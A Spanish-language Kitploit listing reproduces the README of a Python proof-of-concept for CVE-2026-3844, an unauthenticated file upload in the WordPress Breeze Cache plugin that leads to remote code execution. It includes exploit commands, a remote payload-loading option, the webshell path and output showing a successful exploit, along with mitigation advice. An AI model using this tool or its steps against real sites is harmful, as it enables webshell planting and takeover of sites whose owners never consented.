Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/sahmsec/cve-2026-3844
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónDesarrollo de Payloads
GitHubsahmsec/cve-2026-3844

CVE-2026-3844

Prueba de concepto en Python para CVE-2026-3844, una subida arbitraria de archivos sin autenticación en el plugin Breeze Cache de WordPress, que permite la ejecución remota de código. Incluye detección, explotación y verificación de webshell.

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-3844 — WordPress Breeze Cache Subida de Archivos No Autenticada

Resumen

Este repositorio contiene un script de prueba de concepto (PoC) en Python para demostrar una vulnerabilidad de Subida Arbitraria de Archivos No Autenticada que afecta al plugin WordPress Breeze Cache <= 2.4.4.

⚠️ Este proyecto está destinado estrictamente a pruebas de seguridad autorizadas, investigación educativa y validación defensiva únicamente.


Información de la Vulnerabilidad

  • ID CVE: CVE-2026-3844
  • Plugin Afectado: Breeze Cache para WordPress
  • Versiones Afectadas: <= 2.4.4
  • Tipo de Problema: Subida Arbitraria de Archivos No Autenticada
  • Impacto: Posible Ejecución Remota de Código (RCE)
  • Vector de Ataque: Remoto / No Autenticado

La vulnerabilidad abusa de la funcionalidad de caché de gravatar de Breeze Cache para almacenar archivos controlados por el atacante dentro del directorio de caché de WordPress.


Características

  • Modo de detección de vulnerabilidad
  • Flujo de explotación automatizado
  • Soporte de verificación de webshell
  • Salida de terminal a color
  • Carga remota de payloads
  • Comprobaciones de verificación de subida
  • Registro de salida opcional

  • Requisitos

    • Python 3.8+
    • pycurl
    • termcolor

    Instalar dependencias:

    root@kitploit:~
    pip install pycurl termcolor
    

    Archivos

    ArchivoDescripción
    CVE-2026-3844.pyScript principal del PoC
    CVE-2026-3844.yamlPlantilla/configuración YAML

    Uso

    Comprobar si el Objetivo Parece Vulnerable

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com --check-only
    

    Ejecutar Exploit

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com
    

    Payload Personalizado

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
    

    Guardar Resultados

    root@kitploit:~
    python3 CVE-2026-3844.py -u http://target.com -o results.txt
    

    Cómo Funciona

    El script realiza los siguientes pasos:

    1. Detecta la versión instalada de Breeze Cache
    2. Comprueba si la versión del plugin es vulnerable
    3. Envía una solicitud de comentario de WordPress manipulada
    4. Abusa del manejo de gravatar de la caché de Breeze
    5. Espera a que se genere la caché
    6. Verifica si el archivo subido se vuelve accesible
    7. Prueba la capacidad de respuesta del payload

    Ruta Vulnerable

    El payload subido puede volverse accesible desde:

    root@kitploit:~
    /wp-content/cache/breeze-extra/gravatars/
    

    Notas

    La explotación exitosa puede depender de que la siguiente configuración de Breeze esté habilitada:

    root@kitploit:~
    Host Files Locally - Gravatars
    

    Si la función está deshabilitada, los intentos de explotación pueden fallar.


    Ejemplo de Salida

    root@kitploit:~
    [+] Target VULNERABLE (Breeze v2.4.4)
    [+] Comment posted successfully
    [+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
    [+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
    

    Aviso Legal

    Este repositorio se proporciona para:

    • Investigación de seguridad
    • Fines educativos
    • Pruebas de penetración autorizadas
    • Evaluaciones de seguridad defensiva

    No utilice este proyecto contra sistemas que no posea o para los que no tenga permiso explícito de prueba.

    El autor no asume ninguna responsabilidad por el mal uso o los daños causados por este proyecto.


    Recomendaciones de Mitigación

    Los administradores de sitios web deberían:

    • Actualizar Breeze Cache a la última versión parcheada
    • Deshabilitar funciones innecesarias de caché de archivos
    • Restringir subidas de archivos peligrosos
    • Deshabilitar la ejecución de PHP dentro de los directorios de caché
    • Monitorear /wp-content/cache/ en busca de archivos sospechosos
    • Implementar un Firewall de Aplicaciones Web (WAF)
    • Aplicar una validación estricta en el lado del servidor

    Declaración de Propósito Educativo

    Esta prueba de concepto fue creada para ayudar a:

    • Investigadores de seguridad
    • Probadores de penetración
    • Equipos azules
    • Administradores de WordPress
    • Desarrolladores

    a comprender los riesgos de seguridad asociados con mecanismos de caché inseguros y subidas arbitrarias de archivos.


    Referencias

    • Base de Datos CVE
    • Avisos de Seguridad de WordPress
    • Guías de Seguridad de Subida de Archivos de OWASP
    • Documentación del Plugin Breeze Cache

    Autor

    Proyecto Educativo / Investigación de Seguridad

    Descargar herramienta